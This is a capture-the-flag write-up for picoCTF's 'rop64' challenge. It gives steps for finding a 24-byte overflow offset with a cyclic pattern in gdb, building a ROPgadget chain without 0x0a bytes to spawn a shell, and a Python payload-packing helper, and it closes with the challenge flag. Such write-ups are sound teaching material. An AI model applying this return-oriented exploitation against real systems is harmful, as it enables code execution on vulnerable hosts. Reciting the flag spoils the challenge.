
rop64

Problem

Time for the classic ROP in 64-bit. Can you exploit this program to get a flag? You can find the program in /problems/rop64_0_4c66bec7dba72276ffa01e0ad2d6ec8f on the shell server. Source.

Solution

  1. Get the padding
    1. Run python2 -c "from pwn import *; print cyclic(1000, n=8)" > fuzz.in to write a cyclic pattern whose 8-byte subsequences are all unique.
    2. Start the program in gdb (preferably with the pwndbg extension), run r < fuzz.in, and after the crash run x $rbp. The error message leaks the value the overflow left in rbp: 0x6161616161616163: Cannot access memory at address 0x6161616161616163
    3. Run python2 -c "from pwn import *; print cyclic_find(0x6161616161616163, n=8)" to get an offset of 16.
    4. Add 8 to that offset: the 8 bytes at offset 16 are the saved frame/base pointer (8 bytes because this is a 64-bit program), and the saved return address, which is what we want to overwrite, is the next 8-byte slot up the stack.
    5. So the padding is 'a'*(16+8), i.e. 24 bytes.
  2. Run python ROPgadget.py --binary ./vuln --ropchain --badbytes "0a" to have ROPgadget generate a ROP chain that contains no 0x0a (newline) bytes, since a newline would cut the input short.
  3. Paste the generated chain into the exploit right after the padding of 'a'*24. The chain has to start exactly at the saved return address so that every 8-byte gadget address in it stays aligned.
  4. Run script.py to deliver the payload to the remote service.
  5. Run cat flag.txt in the shell that spawns.
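As an added worked example (not part of the original writeup or of pwntools), the block below reimplements in plain Python 3 the two helpers the steps above rely on, cyclic and cyclic_find, using the same de Bruijn construction pwntools uses, so the offsets agree with the n=8 values measured in gdb. It then assembles the payload the later steps describe: 24 bytes of padding followed by little-endian 8-byte chain words, refusing any word that contains a bad byte such as 0x0a, which is the filter ROPgadget's --badbytes "0a" applies. The gadget addresses in the demo chain are placeholders chosen to exercise the packer; they are not from the challenge binary.

```python
import struct
from itertools import islice
from string import ascii_lowercase

# Value the writeup reads out of $rbp after the crash, and the width of a
# saved register slot on x86-64.
CRASH_RBP = 0x6161616161616163
WORD = 8


def de_bruijn(alphabet=ascii_lowercase, n=WORD):
    """Lazily yield the de Bruijn sequence B(k, n) over `alphabet`.

    Same construction as pwntools' cyclic(), so offsets found here match
    `cyclic_find(..., n=8)` in the writeup. Lazy because B(26, 8) is far too
    large to materialise; callers take only the prefix they need.
    """
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length, n=WORD):
    """First `length` bytes of the pattern, like pwntools' cyclic(length, n=8)."""
    return "".join(islice(de_bruijn(n=n), length)).encode()


def cyclic_find(value, n=WORD, search_len=4096):
    """Offset in the pattern of the n-byte word `value` spells when read little-endian.

    A register dumped by gdb holds the bytes in little-endian order, so the
    register value 0x6161616161616163 corresponds to the ASCII run b"caaaaaaa".
    """
    needle = value.to_bytes(n, "little")
    return cyclic(search_len, n).find(needle)


def return_address_offset(crash_rbp):
    """Offset of the saved return address: the saved-rbp slot plus one word."""
    saved_rbp = cyclic_find(crash_rbp)
    if saved_rbp < 0:
        raise ValueError("crash value does not come from the cyclic pattern")
    return saved_rbp + WORD


def build_payload(padding_len, chain, badbytes=b"\n"):
    """Padding up to the return address followed by the ROP chain, little-endian.

    Rejects any gadget address or constant whose packed bytes contain a bad
    byte; this is the check ROPgadget's --badbytes "0a" performs for you.
    """
    payload = b"a" * padding_len
    for word in chain:
        packed = struct.pack("<Q", word)
        bad = [b for b in badbytes if b in packed]
        if bad:
            raise ValueError("0x%016x contains bad byte 0x%02x" % (word, bad[0]))
        payload += packed
    return payload


if __name__ == "__main__":
    print(cyclic(24))                        # b'aaaaaaaabaaaaaaacaaaaaaa'
    print(cyclic_find(CRASH_RBP))            # 16, the saved rbp slot
    print(return_address_offset(CRASH_RBP))  # 24, the padding the writeup uses
    # Placeholder gadget addresses (constructed, not from the challenge binary).
    demo_chain = [0x0000000000401000, 0x0000000000402000]
    print(len(build_payload(return_address_offset(CRASH_RBP), demo_chain)))  # 40
```

To use this against a real chain, replace demo_chain with the addresses and constants ROPgadget prints, in order; a word such as 0x400a00 would be rejected because its second little-endian byte is 0x0a, which is exactly the case --badbytes "0a" exists to avoid.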

Flag

picoCTF{rOp_t0_b1n_sH_w1tH_n3w_g4dg3t5_d4b7a298}